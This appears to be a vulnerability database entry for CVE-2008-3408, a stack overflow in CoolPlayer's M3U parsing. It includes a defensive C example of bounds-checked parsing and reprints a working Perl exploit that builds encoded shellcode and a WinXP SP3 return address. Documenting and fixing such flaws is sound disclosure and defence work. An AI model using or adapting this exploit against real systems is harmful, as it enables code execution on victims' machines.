CoolPlayer M3U File Handling Stack Buffer Overflow Vulnerability

Vulnerability ID: 1115783
Vulnerability type: Buffer overflow
Published: 2008-07-29
Updated: 2009-01-29
CVE ID: CVE-2008-3408
CNNVD ID: CNNVD-200807-498
Platform: Windows
CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/6157
https://cxsecurity.com/issue/WLB-2011010114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-498
|Vulnerability details
CoolPlayer is an open-source audio player. CoolPlayer contains a stack-based buffer overflow in its handling of malformed .M3U playlist files. If a user is tricked into loading an .M3U file that contains an entry longer than 260 bytes, the overflow is triggered and arbitrary code can be executed.
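The bug class described above is an unbounded copy of a playlist entry into a fixed-size stack buffer (260 bytes, the size of Windows MAX_PATH). The following is an added illustration of the corresponding fix, not CoolPlayer's own code: a hypothetical M3U reader that checks each entry's length against the buffer before copying and rejects over-long entries instead of overflowing. The function names, the MAX_ENTRY_LEN limit and the sample playlist in run_demo() are all constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical hardened M3U reader (example code, not CoolPlayer's).
 * MAX_ENTRY_LEN mirrors a MAX_PATH-sized buffer, including the terminating NUL,
 * so the longest accepted entry is 259 bytes. */
#define MAX_ENTRY_LEN 260

typedef struct {
    size_t accepted;   /* entries that fit and were copied into the buffer */
    size_t rejected;   /* entries refused because they exceed the limit */
} m3u_stats;

/* Copy one playlist entry into a fixed-size buffer only if it fits.
 * Returns 1 on success, 0 if the entry is too long. Never writes past dst,
 * which is exactly the check the vulnerable pattern lacks. */
static int copy_entry_bounded(char dst[MAX_ENTRY_LEN], const char *src, size_t len)
{
    if (len >= MAX_ENTRY_LEN)   /* need room for the NUL terminator */
        return 0;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 1;
}

/* Parse an in-memory M3U document line by line. Lines beginning with '#'
 * are directives or comments (#EXTM3U, #EXTINF) and carry no path, so they
 * are skipped; CRLF line endings are tolerated. */
m3u_stats parse_m3u(const char *data)
{
    m3u_stats st = {0, 0};
    const char *p = data;
    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len && p[len - 1] == '\r')   /* strip '\r' from CRLF files */
            len--;
        if (len > 0 && p[0] != '#') {
            char path[MAX_ENTRY_LEN];    /* fixed stack buffer, as in the bug class */
            if (copy_entry_bounded(path, p, len))
                st.accepted++;
            else
                st.rejected++;           /* over-long entry: refused, not overflowed */
        }
        if (!eol)
            break;
        p = eol + 1;
    }
    return st;
}

/* Constructed sample playlist: two ordinary entries, one entry of exactly
 * 259 bytes (the longest that fits), and one 300-byte entry that must be
 * rejected. Returns the parser's accept/reject counts. */
m3u_stats run_demo(void)
{
    static char doc[1024];
    char long_ok[MAX_ENTRY_LEN];   /* 259 'A's + NUL: fits */
    char too_long[301];            /* 300 'A's + NUL: exceeds the buffer */
    memset(long_ok, 'A', MAX_ENTRY_LEN - 1);
    long_ok[MAX_ENTRY_LEN - 1] = '\0';
    memset(too_long, 'A', 300);
    too_long[300] = '\0';
    snprintf(doc, sizeof doc,
             "#EXTM3U\n#EXTINF:123,Song\nC:\\music\\song.mp3\n%s\n%s\r\ntrack2.mp3",
             long_ok, too_long);
    return parse_m3u(doc);
}

int main(void)
{
    m3u_stats st = run_demo();
    printf("accepted=%zu rejected=%zu\n", st.accepted, st.rejected);
    return 0;
}
```

The choice to reject rather than silently truncate is deliberate: truncating a path can turn one file name into another, while an explicit rejection surfaces the malformed entry to the user or to a log, which is also the signal a defender would want when such a playlist arrives by e-mail or download.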
|Vulnerability exploit (EXP)
#!/usr/bin/perl
# k`sOSe - 07/29/2008

use warnings;
use strict;

# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" .
		"\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" .
		"\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" .
		"\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" .
		"\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" .
		"\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" .
		"\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" .
		"\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" .
		"\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" .
		"\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" . 
		"\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" .
		"\x1e\x28\x44\xd4";

print	$shellcode	.
	"\x41" x (218 - length($shellcode)) .
	"\x32\x4c\x3c\x7e" ; # call ebx  user32.dll  winxp sp3

# milw0rm.com [2008-07-29]
|References

Source: XF
Name: coolplayer-m3u-bo(44103)
Link: http://xforce.iss.net/xforce/xfdb/44103

Source: BID
Name: 30418
Link: http://www.securityfocus.com/bid/30418

Source: MILW0RM
Name: 6157
Link: http://www.milw0rm.com/exploits/6157

Source: VUPEN
Name: ADV-2008-2264
Link: http://www.frsirt.com/english/advisories/2008/2264/references

Source: SREASON
Name: 4088
Link: http://securityreason.com/securityalert/4088

Source: SECUNIA
Name: 31294
Link: http://secunia.com/advisories/31294